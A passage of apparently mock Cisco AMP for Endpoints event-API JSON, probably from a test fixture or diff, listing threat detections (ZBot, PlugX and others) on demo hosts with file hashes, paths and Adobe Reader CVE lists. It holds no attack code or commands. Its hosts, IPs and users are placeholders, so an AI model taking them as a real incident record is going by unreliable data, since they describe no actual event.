Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255369279438863","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906497130791000,"timestamp":1610704993,"timestamp_nanoseconds":662000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906497130790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX0\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":428,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395608001000,"timestamp":1610704992,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:03:12+00:00","event_type":"Adobe Reader 
compromise","event_type_id":1107296261,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704992,"start_date":"2021-01-15T10:03:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"},"parent":{"disposition":"Clean","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266559459951000,"timestamp":1610704979,"timestamp_nanoseconds":950000000,"date":"2021-01-15T10:02:59+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5832266559459950593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":25939,"local_ip":"10.10.0.0","local_port":15322,"nfm":{"direction":"Outgoing connection from","protocol":"UDP"},"parent":{"process_id":1512,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":701000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408458","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408457","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266499330408000,"timestamp":1610704965,"timestamp_nanoseconds":451000000,"date":"2021-01-15T10:02:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266499330408456","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266495035441000,"timestamp":1610704964,"timestamp_nanoseconds":482000000,"date":"2021-01-15T10:02:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat 
Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat 
Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat 
